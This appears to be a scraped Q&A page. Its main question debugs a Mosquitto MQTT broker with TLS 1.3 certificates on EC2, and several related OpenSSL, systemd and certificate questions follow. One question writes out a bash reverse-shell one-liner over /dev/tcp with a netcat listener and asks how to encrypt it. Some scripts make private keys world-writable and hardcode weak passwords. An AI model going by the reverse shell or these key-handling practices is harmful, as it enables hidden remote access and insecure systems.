I use this guthub to implement the establishment of broker in AWS ec2.
https://github.com/chiachin2686/oqs-demos/tree/main/mosquitto
broker-start.sh
#!/bin/bash
# generate the configuration file for mosquitto
echo -e "
## Listeners
listener 8883
max_connections -1
max_qos 2
protocol mqtt
## General configuration
allow_anonymous false
# Comment out the following two lines if using two-way authentication
#password_file /test/passwd
#acl_file /test/acl
## Certificate based SSL/TLS support
cafile /test/cert/CA.crt
keyfile /test/cert/server.key
certfile /test/cert/server.crt
tls_version tlsv1.3
ciphers_tls1.3 TLS_AES_128_GCM_SHA256
# Comment out the following two lines if using one-way authentication
require_certificate true
## Same as above
use_identity_as_username true
" > mosquitto.conf
# generate the password file(add username and password) for the mosquitto MQTT broker
mosquitto_passwd -b -c passwd user1 1234
# generate the Access Control List
echo -e "user user1\ntopic readwrite test/sensor1" > acl
mkdir cert
# copy the CA key and the cert to the cert folder
cp /test/CA.key /test/CA.crt /test/cert
# generate the new server CSR using pre-set CA.key & cert
openssl req -new -newkey $SIG_ALG -keyout /test/cert/server.key -out /test/cert/server.csr -nodes -subj "/O=test-server/CN=$BROKER_IP"
# generate the server cert
openssl x509 -req -in /test/cert/server.csr -out /test/cert/server.crt -CA /test/cert/CA.crt -CAkey /test/cert/CA.key -CAcreateserial -days 365
# modify file permission
chmod 777 cert/*
# execute the mosquitto MQTT broker
mosquitto -c mosquitto.conf -v
Then I enter the following command in EC2 to enable broker:
sudo docker run -it --rm --net=host --name oqs-mosquitto-demo -p 8883:8883 -e "BROKER_IP=<Public IP in ec2>" -e "EXAMPLE=broker-start.sh" oqs-mosquitto-img
In the second step, I enter the following command in my VirtualBox(ubuntu) to enable publisher-start.sh
publisher-start.sh
#!/bin/bash
mkdir cert
# copy the CA key and the cert to the cert folder
cp /test/CA.key /test/CA.crt /test/cert
# generate the new publisher CSR using pre-set CA.key & cert
openssl req -new -newkey $SIG_ALG -keyout /test/cert/publisher.key -out /test/cert/publisher.csr -nodes -subj "/O=test-publisher/CN=$PUB_IP"
# generate the publisher cert
openssl x509 -req -in /test/cert/publisher.csr -out /test/cert/publisher.crt -CA /test/cert/CA.crt -CAkey /test/cert/CA.key -CAcreateserial -days 365
# modify file permissions
chmod 777 cert/*
# execute the mosquitto MQTT publisher
mosquitto_pub -h $BROKER_IP -m "Hello world." -t test/sensor1 -q 0 -i "Client_pub" -d --repeat 60 --repeat-delay 1 \
--tls-version tlsv1.3 --cafile /test/cert/CA.crt \
--cert /test/cert/publisher.crt --key /test/cert/publisher.key
Then I enter the following command in ec2 to enable broker:
sudo docker run -it --rm --net=host -p 8883:8883 --name oqs-mosquitto-publisher -e "BROKER_IP=<Public IP in ec2>" -e "EXAMPLE=publisher-start.sh" oqs-mosquitto-img
This is broker message in ec2:
1670399106: Warning: Unable to drop privileges to 'mosquitto' because this user does not exist. Trying 'nobody' instead.
1670399106: mosquitto version 2.0.15 starting
1670399106: Config loaded from mosquitto.conf.
1670399106: Opening ipv4 listen socket on port 8883.
1670399106: Opening ipv6 listen socket on port 8883.
1670399106: mosquitto version 2.0.15 running
1670399120: New connection from 49.216.40.44:8247 on port 8883.
1670399120: OpenSSL Error[0]: error:1409441B:SSL routines:ssl3_read_bytes:tlsv1 alert decrypt error
1670399120: Client <unknown> disconnected: Protocol error.
Related
I've followed instrunction on https://www.elastic.co/guide/en/elastic-stack-get-started/7.4/get-started-docker.html#get-started-docker-tls to setup basic authentication
The doc creates certificate by
bash -c '
yum install -y -q -e 0 unzip;
if [[ ! -f /certs/bundle.zip ]]; then
bin/elasticsearch-certutil cert --silent --pem --in config/certificates/instances.yml -out /certs/bundle.zip;
unzip /certs/bundle.zip -d /certs;
fi;
chown -R 1000:0 /certs
'
It seems I can connect to the https endpoint from localhost only, is it?
Yes elastic can generate CSR for sign it in Public CA or corporate CA or it issues just selfsign certificate.
So if you issued self-sign - sure you can use it in production but with "no veryfy certificate" option. Otherwise you can buy or order free certificate for example letsencrypt.
I want to encrypt a file and log the time at shutdown or reboot.
Here is what i do.
1.edit a bash script file to execute at shutdown or reboot.
vim log.sh
key="123456"
openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc
date >> /home/log.info
2.edit a log.service
sudo vim /etc/systemd/system/log.service
[Unit]
Description=Run command at shutdown
Before=shutdown.target reboot.target
[Service]
Type=oneshot
RemainAfterExit=true
ExecStop=/bin/bash /home/log.sh
[Install]
WantedBy=multi-user.target
3.systemctl enable log.service
4.reboot
After reboot i found that there is a date info in /home/log.info ,it means date >> /home/log.info executed,no $HOME/test.asc there,it means openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc not executed.
The commands can run successfully in terminal .
key="123456"
openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc
How to fix my log.service file /etc/systemd/system/log.service to make openssl command executed at shutdown and reboot?
The issue is that ${HOME} doesn't expand to what you expect. When I try it on my system it expands to nothing. So ${HOME}/test becomes /test. You can check this by redirecting the error output for your openssl command in log.sh:
openssl enc -des3 -a -salt -in $HOME/test -k ${key} -out $HOME/test.asc 2> /home/log.error
Solution 1:
Use absolute paths in log.sh
Solution 2:
Add User= in service section of log.service. In this case make sure that the user has rights to write to the different locations where you want to write. For reference see systemd.exec
$USER, $LOGNAME, $HOME, $SHELL
User name (twice), home directory, and the login shell. The variables are set for the units that have User= set, which includes user systemd instances
Before= is documented in man systemd.unit. It's not intended for this use case. Also documented there is WantedBy= and RequiredBy=. The latter sounds like what is desired here, but your logging fails, it could block shutdown. WantedBy= won't block shutdown if it fails. Read about them both and see which one fits your case better.
I would recommend a file structure like this:
```
[Unit]
Description=Run command at shutdown
[Service]
Type=oneshot
RemainAfterExit=true
ExecStop=/bin/bash /home/log.sh
[Install]
WantedBy=shutdown.target reboot.target
```
Your Install block was setting the service to start at boot time, which is not what you want. The new syntax will set the service to be active at shutdown time when you use systemctl enable log.service to enable it.
I have not tested this method of run-at-shutdown with systemd. Let us know how it works!
I try to create a Certificate Signing Request (CSR) using
openssl req -new -sha256 -key domain.key -subj "/" \ -reqexts SAN -config <(cat /System/Library/OpenSSL/openssl.cnf \ <(printf "[SAN]\nsubjectAltName=DNS:foo.com,DNS:www.foo.com"))
but getting the following error message on my macbook
cat: /dev/fd/63: No such file or directory
unknown option -reqexts
Any ideas?
Your command is probably copy&paste of a multi-line command where backslashes are used to join lines, however you somehow managed to get newlines converted to spaces.
Remove all occurences of "backslash + space".
I came across this question and in my case I did not have any \ , but I was using sudo so I had to use sudo su -c
$ sudo su -c 'openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout /etc/ssl/private/nginx-blah.blah.com.key -new -out /etc/ssl/certs/nginx-blah.blah.com.crt -subj "/O=blah.com/OU=blah/CN=blah.blah.com" -reqexts SAN -extensions SAN -config <(cat /etc/ssl/openssl.cnf <(printf "[SAN]\nsubjectAltName=DNS:blah.blah.com,IP:192.168.174.128")) -sha256'
In some cases not mounted devpts can lead to the same error print. So needed to do:
mount -t devpts devpts /dev/pts
I am trying to convert a p12 to a pem from a shell script without any user input.
I can have the password as a variable within the script.
so when I call:
openssl pkcs12 -in *.p12 -out cert.pem -nodes
The terminal prints "Enter Import Password:" and waits for input.
I tried to pipe the password in with:
echo $PASS | openssl pkcs12 -in *.p12 -out cert.pem -nodes
as well as trying to use a flag with the openssl command but can't figure out how to do this.
This one liner worked for me-
openssl pkcs12 -in certificate.p12 -password pass:<your_password> -nodes | openssl x509 -noout -enddate
So I have a basic communication stream that managed by netcat. A user can create a bash shell and forward control to localhost at port 5555, for example. How could you pipe this through OpenSSL to achieve a connection that is symmetrically encrypted? I am only able to work with tools that come installed on an OSX machine.
Create Shell
bash -i >& /dev/tcp/localhost/5555 0>&1
Catch Shell
nc -l -p 5555
Encrypt data with OpenSSL
openssl aes-256-cbc -salt -a -e -in plaintext.txt -out encrypted.txt
Decrypt data with OpenSSL
openssl aes-256-cbc -salt -a -d -in encrypted.txt -out plaintext.txt
Kind of what I'm looking for
bash -i & | openssl -e > /dev/tcp/localhost/5555 0>&1
nc -l -p 5555 | openssl -d
Based on additional information from your comment, install MacPorts, and try to use ported socat or stunnel.
dtpwmbp:~ pwadas$ uname -a ; sudo port list |egrep -i socat\|stunnel
Darwin dtpwmbp 12.4.0 Darwin Kernel Version 12.4.0: Wed May 1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
stunnel #4.47 security/stunnel
socat #1.7.2.1 sysutils/socat
dtpwmbp:~ pwadas$
http://www.macports.org